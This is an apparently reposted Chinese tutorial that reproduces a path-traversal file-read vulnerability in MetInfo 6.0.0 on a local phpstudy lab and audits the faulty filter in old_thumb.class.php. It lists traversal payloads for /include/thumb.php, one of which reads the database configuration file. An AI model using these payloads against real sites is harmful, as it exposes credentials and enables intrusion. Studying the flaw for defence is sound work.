当前位置: 首页 > news >正文

文件读取漏洞复现(Metinfo 6.0.0)

文章目录

  • 安装环境
  • 启动环境
  • 漏洞复现
  • 代码审计

安装环境

安装phpstudy,下载MetInfo 6.0.0版本软件,复制到phpstudy目录下的www目录中。

打开phpstudy,访问浏览器127.0.0.1/MetInfo6.0.0/install/index.php,打开Meinfo 6.0.0主页:
在这里插入图片描述

点击下一步、下一步,到数据库设置中配置数据库信息,数据库名设为met,密码设为root:

在这里插入图片描述

填写管理员设置,设置用户名,密码设为root,手机号码和电子邮箱随便填写:

在这里插入图片描述

点击保存设置后显示安装完成:

在这里插入图片描述

启动环境

安装成功后打开网页,点击登录,来到输入用户名和密码的输入框:

在这里插入图片描述

漏洞复现

漏洞原理

在MetInfo软件的old_thumb.class.php文件存在任意文件读取漏洞。攻击者利用此文件漏洞窃取网站上的资产。

访问漏洞点127.0.0.1/MetInfo6.0.0/include/thumb.php,访问后发现只有一张图片:

在这里插入图片描述

打开bp抓包(注意在filter中勾选images,不然无法显示抓包的图片数据包),Ctrl+R发送到重定向,点击send发送,如下图:

在这里插入图片描述

替换读取的路径:

第一、二、三次测试:

/include/thumb.php?dir=..././http/..././config/config_db.php
/include/thumb.php?dir=.....///http/.....///config/config_db.php
/include/thumb.php?dir=http/.....///.....///config/config_db.php

发送后发现读取配置文件内容失败,漏洞已被官方修复,只有第四次测试成功(注:该漏洞只在Windows下生效,Linux无法利用):

/include/thumb.php?dir=http\..\..\config\config_db.php

如图,读取配置文件内容成功:

在这里插入图片描述

代码审计

在C:\phpStudy\WWW\MetInfo6.0.0\include目录下找到thumb.php文件,查看源码

<?php
# MetInfo Enterprise Content Management System
# Copyright (C) MetInfo Co.,Ltd (http://www.metinfo.cn). All rights reserved.
define('M_NAME', 'include');
define('M_MODULE', 'include');
define('M_CLASS', 'old_thumb');
define('M_ACTION', 'doshow');
require_once '../app/system/entrance.php';
# This program is an open source system, commercial use, please consciously to purchase commercial license.
# Copyright (C) MetInfo Co., Ltd. (http://www.metinfo.cn). All rights reserved.
?>

发现有一个define(‘M_CLASS’, ‘old_thumb’);载入了一个old_thumb类,在目录C:\phpStudy\WWW\MetInfo6.0.0\app\system\include\module下找到这个类的文件:

 $dir = str_replace(array('../','./'), '', $_GET['dir']);if(substr(str_replace($_M['url']['site'], '', $dir),0,4) == 'http' && strpos($dir, './') === false){header("Content-type: image/jpeg");ob_start();readfile($dir);ob_flush();flush();die;
}

发现它过滤了…/和./字符,同时if语句中规定前4个字符必须是http,然后计算字符中./的位置,如果为false即为空,才能由任意文件读取函数readfile($dir)读取。

http://www.lryc.cn/news/155176.html

相关文章:

  • 【工程实践】使用git clone 批量下载huggingface模型文件
  • 2020 杭电多校第三场 H Triangle Collision(反射套路 + 绕点旋转 + 矢量
  • Servlet属性、监听者和会话
  • Gin学习记录2——路由
  • 《计算机算法设计与分析》第一章:算法概述
  • 华为数通方向HCIP-DataCom H12-821题库(单选题:201-220)
  • 使用ELK收集解析nginx日志和kibana可视化仪表盘
  • 【Sentinel】ProcessorSlotChain处理器插槽链与Node
  • 数据库管理系统(DBMS)的事务四大特性(ACID)以及事务的四种隔离级别
  • leetcode 234. 回文链表
  • Scala集合继承体系图
  • 《Go 语言第一课》课程学习笔记(十五)
  • 练习 Qt 实时显示鼠标坐标位置
  • Leetcode130. 被围绕的区域
  • 6.xpath的基本使用
  • uniapp组件库总结笔记
  • day-42 代码随想录算法训练营 动态规划 part 04
  • Swift 周报 第三十六期
  • 手写Mybatis:第19章-二级缓存
  • Alibaba Canal 使用记录
  • GIT实战篇,教你如何使用GIT可视化工具
  • lv3 嵌入式开发-4 linux shell命令(文件搜索、文件处理、压缩)
  • SpringBoot2.0集成WebSocket,多客户端
  • 华为OD机试 - 等和子数组最小和 - 深度优先搜索(Java 2022 Q4 100分)
  • 浏览器会因为什么样的脚本而崩溃
  • 生成与调用C++动态链接库(so文件)
  • 韶音的耳机怎么样,韶音骨传导耳机值得入手吗
  • STM32G030F6 (SOP-20)Cortex ® -M0+, 32KB Flash, 8KB RAM, 17 GPIOs
  • 常用的字符集和字符编码
  • 容器技术简介